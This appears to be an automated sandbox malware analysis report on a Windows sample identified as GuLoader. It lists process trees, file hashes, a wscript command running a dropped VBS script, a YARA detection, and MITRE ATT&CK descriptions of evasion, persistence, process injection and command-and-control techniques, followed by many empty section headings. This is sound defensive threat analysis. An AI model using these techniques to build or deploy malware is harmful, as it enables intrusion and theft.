Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: Fec9qUX4at.exe PID: 1152 Parent PID: 1304

General

Start time:	09:51:04
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\Fec9qUX4at.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Fec9qUX4at.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	2046B941817392E3815535FCCB1F39DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: wscript.exe PID: 808 Parent PID: 1152

General

Start time:	09:52:15
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Imagebase:	0x1090000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Fec9qUX4at.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers